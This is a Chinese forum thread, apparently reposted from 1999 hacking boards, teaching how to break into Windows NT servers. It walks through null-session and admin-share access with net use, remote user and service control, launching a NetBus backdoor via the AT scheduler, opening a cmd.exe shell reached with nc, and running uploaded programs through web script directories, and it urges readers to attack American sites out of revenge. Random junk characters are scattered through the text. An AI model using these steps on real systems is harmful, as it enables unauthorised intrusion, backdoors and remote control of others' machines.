找回密码
 注册

QQ登录

只需一步,快速开始

关于“怎样进入NT主机”的几点补充

[复制链接]
发表于 2011-1-13 17:03:28 | 显示全部楼层 |阅读模式
《版主页黑客工具和文章的几个问题》中提到:1 R; b1 X6 s8 t
请教,从版主页上载得PINGER,GRINDER,LETMEIN等,却不能用,PINGER安装后,明明安装前文件有1M多,但安装完后生成的文件夹中只有PINGER。EXE,40多K,运行PINGER,设置好IP,点PING,弹出一个窗口(C++。。。),说出错,然后关闭了,何故,是不是安装有误? 2。运行LETMEIN,弹出以下错误:连接文件LETMEIN。EXE到不存在的NETAPI32。DLL;NETGROUPGETUSERS。 是否说明需要NETAPI32。DLL文件,哪里有该DLL。 3。USAKILLER 的教学文章中提到需在WINNT4。0下运行以下步骤等,是否要求我的操作系统也是WINNT4。0 ,应该不是吧? 4。NC FOR NT 是否要求我的操作系统为NT,还是服务器的操作系统为NT? 太多的问题需高手回答,我花那么多的时间和金钱下载这几M文件却不能用,实在窝囊哦, 强烈建议USAKILLER 等高手级的黑客写更多的教学文章,以提高我国黑客水平。. `' ~2 ^9 O  z$ D5 x1 X& @/ @
> 我的机子MMX166,WIN98,2。5G,32M内存。3 J7 B: I$ V6 k3 V" a+ {
# F: U# e9 {, q% c
黑客并不神秘,你只要了解操作系统,学习一些操作系统的弱点,辅助相关的工具,就可以成功。( s& D& J$ ~  ~- @4 h, w/ F
你的问题是,pinger, grinder, letmein等工具必须要在NT上运行,我们强烈建议,你一定要安装NT,对于你的机器配制,和我们现在差不多,只是比你多了32M内存,2G硬盘。1 ^  [" P# g7 G( a
其实,攻击敌站,利用其操作系统本身的工具就可以了,比如,我们在NT上攻击某服务器,该服务器为NT4.0,我们将做如下简单事情就有可能成功,假设目标NT的IP地址为111.111.111.111,做法如下:5 ?8 }; L5 D' X/ `$ t4 k, _, t
net use \\111.111.111.111\ipc$ "" /user:""" }& a  D) {" }4 n
net.exe是NT的工具文件,该命令将和目标服务器建立Null Session,如果成功,你可以查看该服务器上的共享目录:
" B! O7 W! [$ M" N/ lnet view \\111.111.111.111
$ v9 k+ F' G: D当然,如果你有该NT管理员密码,就更好办了,假设其管理员Admin密码为fuck:7 B3 U$ {6 @2 H+ d6 X' [
net use \\111.111.111.111\ipc$ "fuck" /user:"Admin"
: f% _: z5 L" _/ V9 Q命令成功后,几乎所有目标NT上的配制,资源,你都可以在你本地NT上连接远程计算机来查看或修改:+ x, B# a; P. H& e
1、查看或修改远程机器上的硬盘,假如目标NT上有C、D两个硬盘:
4 J, |  q3 e) |, fnet use x: \\111.111.111.111\c$7 j' L6 W7 u+ D4 k' j7 X
net use y: \\111.111.111.111\d$1 Q! B/ }% n( T' ]5 `9 Z
这样,目标NT上的C、D盘分别被影射为你本地的X、Y盘,你想怎么做都可以...0 J3 }+ ?9 _4 ]  v6 ]" H0 r
2、管理目标NT的用户:
3 u3 k% x% y/ I5 N+ l+ D" b从“开始”->“程序”->“管理工具(公用)”->“域用户管理器”->菜单:“用户”->“选择域”8 d5 ~+ M& [0 d) f, \9 l1 y
键入\\111.111.111.111后,目标NT上的所有用户你想怎么做都可以,和管理你本地的一样: i# k% S3 O% D5 C$ w
3、管理目标NT的服务
: X9 S; q2 k9 }  \$ Q, _8 d2 B选择“管理工具(公用)”->“服务器管理”->“计算机”->“选择域”. q/ _; g" l) v
这样你可以管理目标NT上的服务,共享目录
7 J/ S8 ]) @6 x4、IIS管理
& b$ G/ l6 {: I( p, L' P选择“Microsoft Internet Service管理”->“Internet 服务管理器”->"连接到服务器"->111.111.111.111
' G" e/ v* Z2 _; {目标NT的FTP、WWW服务你就可以重新配置
3 _* [; v1 X8 z" a6 l: L7 |3 v5、事件管理
. S: Q- ?" G1 w“事件查看器”->连接到服务器->111.111.111.111
4 m( x1 `7 w- @9 K0 a' R* A" h
还有更多的东西,都可以用NT本身的功能来完成,这些都是95, 98所不能实现的。
1 J6 C$ U! u/ V% V( L- P$ n% k9 k5 w
当然,98,95也能做一些事情,但很麻烦,比如:
' G( u( t# I' Y+ n' z" b0 D% cnet use \\111.111.111.111\ipc$
/ \9 j3 x( z  @2 V7 s  E% t# e" Pnet use z: \\111.111.111.111\d$7 J" o" X& [' B- c0 z7 p: F6 e* G
但其后不能带参数,即改用其他用户或密码,系统将用当前用户和密码去登录,如果你知道目标NT的用户或密码,重新启动95, 98,改用该用户和密码登录,方可实现,你可以连接目标NT上的共享资源,但不能进行管理,如用户、事件等
+ R6 @9 |+ ?0 }. C
' z/ \% Q, T3 r$ V我们强烈建议各位有心要为死难者报仇,真正的想黑霉国的站点,花点时间,装个NT吧,NT Workstation也可以!3 [' J! I2 C3 ~- x7 b# w1 a
这样,你还可以了解目标机器上能有什么东东供你去用!% }7 h0 E2 z. _& s2 E5 V
- C' C. r. S, n
. d: _, w" q7 K: W
--------------------------------------------------------------------------------$ ]9 r- Z& r( S; L$ M4 `" A/ @
! S) j- a( ~0 l( o' _( O9 d
>quack于1999-06-12,23:37:44
3 ]# a$ Q) s+ ?( k" X在大作《几个有关黑的问题》中提到:2 {9 z# U8 |$ g/ B% k
首先向各位黑兄们致敬,我下了你们的传的东东,但发现在用LETMEIN.EXE的时候没有用到MYPWD的参数,键入LETMEIN查询其使用方法时亦无此参数项,不知为是何原因?另,用PINGER查询到的IP地址若无机器名的是否可以直接进入,我怎么用NET USE总无法登陆?再有,假定我上传了CIH,对了,CIH对NT暂时无效,假定上传其它"有益"美国NT主机的东东上去,而未传NETBUS,可否直接在其机了运行此东东使其当堂暴毙?--我曾用LEGION上美国机子,但运行程序时却是在我的机上干活,差点把自己毙了!再有,我在微软的CHAT中常遇到美国鬼子,在其CHAT下怎样才能看到它的IP?怎样把它们给KILL了?--顺便说一句,我还真干掉了几个美国人,哈!。
" S' t. j/ {) d, m9 f$ q- H5 w5 u7 X- g5 F( h
killusa于1999-06-13,03:25:153 |9 A2 e% h7 o! @
在大作《Re: 几个有关黑的问题》中提到:) \- E, J- O; i2 }- L0 m

) X% y, D- g) W& u) lletmein.exe 暂时没有mypwd参数,十分抱歉
: M( o4 T3 t7 Z! P: ~" Tpinger程序,只是利用ping来寻找主机,每台NT服务器有一个主IP地址,但也可以设置多个辅助IP地址,比如有些服务器供应商,一台NT服务器上可以设置一千多个IP,每个IP对应一个Hostname,而真正能找到主机名的只有一个IP地址,就是该主机的主IP地址,所以有时显示只有IP,而无主机名。另外,有些服务器是非NT的操作系统,有时将不会显示主机名。当然,有时在服务器上进行一些设置,也会出现上面的情况。  |: }% n# n2 H" `( U8 P1 ]
5 b8 b: z5 B# Z2 _  R
Netbus分客户端程序ntsrv.exe和服务器端netbus.exe两个程序,所以,netbus.exe是不用上传的,只需在目的
! J+ F) o( W* N" {2 D2 D! q8 \5 Z$ z服务器上运行ntsrv.exe,而在目的服务器运行该程序有很多种方法:/ n( z  @( [3 L+ v8 I) u
- U) Z3 y, g* Q
1、利用服务器的 Schedule 服务来启动schedule 服务是指在服务器上定时运行某程序,具体使用方法,可在自己的NT Dos窗口下键入以下:$ w& T$ k+ g, H# n  Q
- W  D7 W$ U3 N
C:\>net start schedule
1 a5 U( q: h1 e8 n/ q9 nSchedule 正在启动服务.....$ ]$ }, u7 i" V& c* O
Schedulw 服务启动成功。0 A! G2 t8 U5 V2 I
C:\>at /?
4 o1 L9 f' e3 \2 [% M3 t( q  {+ aAT 命令排定在特定的日期和时间运行某些命令和程序。
# ^) s* m  F2 p; U4 E' G# }运行 AT 命令之前必须先启动 Schedule 服务。
) I) R# U+ |2 u. J1 M; m6 Z6 Z
6 R% I; R' K! D6 d; N+ r$ T2 OAT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]]
& M6 b5 Z' e- T5 D' ?AT [\\computername] time [/INTERACTIVE]1 D, ^! c. d- T( o  t- N
[ /EVERY:date[,...] | /NEXT:date[,...]] "command", Q6 w$ _' h7 m, H6 d9 z$ Q7 I
- X+ _1 o% M4 d) |, ]" g: c
\\computername 指定远程计算机。 如果省略这个参数
/ E6 b! o% t# t5 [命令会被排定在本机上运行。. ^0 G& s) i/ ~) e; l
id 指定给排定进度命令的识别号。
: k6 Z  Q  @6 P$ y. [: K8 e; ~5 N1 i& O/ k7 o1 D2 A% o! ?
/delete 删除某个已排定进度的命令。如果省略标识,计算机上所有已排定进度的命令都会被删除。% D! t  @1 ~! L# b
/yes 用于删除所有作业,且不想在运行删除时显示确认信息 。
; [7 s& k; X* a; t7 [0 A/ Otime 指定命令运行的时间。5 f! N6 U6 W  g1 ]' E! Z$ h
/interactive 允许作业在运行时,与用户通过桌面交互。/ z& g; ^9 }& ^, s$ S% w3 V% g  j
3 X( j7 _) G8 m
/every:date[,...] 指定在每周或每月的某日 (或某几日) 运行命令。
: f, n; X0 U6 t  t# h; q; t: Z" ^如果省略日期,则默认为在每月的本日运行。
) I0 r+ X1 W' l) s0 T3 ?  a7 T+ L
( h2 X* ~" F: y: M$ V$ y/next:date[,...] 指定在下一个指定日期 (如,下周三),运行命令。如果省略日期,则默认为在每月的本日运行。
8 a3 h  s# u) M) h9 m1 _3 b
! p; c$ B) R2 b- Z0 ~- q' B+ I"command" 准备运行的 Windows NT 命令或批处理文件。
. g% m8 U, h7 I9 a& u8 o6 ~8 E( d* C0 r# z8 j7 K% f, |$ x
C:\>9 \9 x( G* B; e- T6 W

& u$ d& b( F) \. X" ?% G! P知道了如何使用AT,再来看看如何在远程NT上运行ntsrv.exe:* G1 q* |* c! r3 b* X' }6 u
1 利用管理员登陆到目的服务器,方法为: net use \\x.x.x.x\ipc$ "adminpwd" /user:"adminuser"* f0 Q; f) u0 N( y3 x, z
2 利用ntsrv.exe启动远程: netsvc \\x.x.x.x schedule /start" l6 m# t! K; O( ~
3 利用AT.EXE在远程服务器设置程序定时运行,当然最快运行最理想,所以,你可以用letmein.exe得到服务器的时间,然后:, x& W9 B/ c- E/ c: u. w% p/ [' C  a
at \\x.x.x.x 00:00 ntsrv.exe /port:64321, t( [0 G( w# B; h* N
其中00:00要改为用letmein.exe得回来的具体时间+一点容量,等一会后,再在本地启动netbus.exe,键入目的服务器得ip地址或hostname,连接!具体使用可参照 "How to get in nt",比如第一种方法,你想要在目的服务器运行 LEGION,可以利用netbus得上传功能,将LEGION上传至目的服务器,再用netbus的"Start program",键入完整路径的LEGION运行程序,就ok了!第二种方法是利用netbus的“App redirect”功能,启动远程telnet服务,如下:在netbus中击“App redirect”,键入"C:\>winnt\system32\cmd.exe",Port为:4321,服务就启动了,然后在本地运行:nc x.x.x.x 4321,出现dos启动的画面就表示连接成功:6 s5 R. U& n% d, r1 c, ~9 G! U2 |
Microsoft(R) Windows NT(TM)
: {' [6 q5 d! O8 p(C) Copyright 1985-1996 Microsoft Corp.
: v. M- q! I( U) j. T1 r7 R& JC:\>
4 k: b; p; N4 z+ t6 e; h1 O  R2 d! A( f2 Z% {) M! `. j- m
2、利用web启动ntsrv.exe或其他程序在目的服务器; C  X1 y! o& G

% y, U. _: \9 x" U5 N! l将ntsrv.exe 或其他运行程序Copy到目的服务器的www可执行目录,如cgi-bin或scripts,然后在浏览器键入url如:# k% {$ `' L! I# n' ?
http://x.x.x.x/scripts/ntsrv.exe /port:64321
6 ~3 w& M1 z. K6 q# }- p, x7 o# Ihttp://x.x.x.x/cgi-gin/ntsrv.exe /port:64321
, F' {2 L) @9 g该程序就启动了/ q4 }) a- Y* b  f% \
& a  o! z# K0 L- D6 O
我只提这几中方法!
' k# ?8 w  r1 s( D要成功,必须打好基础工,对操作系统充分了解!
2 @; A3 k1 F" h4 g+ u
; G3 o: b5 c9 v, m
您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|本地广告联系: QQ:905790666 TEL:13176190456|Archiver|手机版|小黑屋|汶上信息港 ( 鲁ICP备19052200号-1 )

GMT+8, 2026-6-14 23:34

Powered by Discuz! X5.0

© 2001-2026 Discuz! Team.

快速回复 返回顶部 返回列表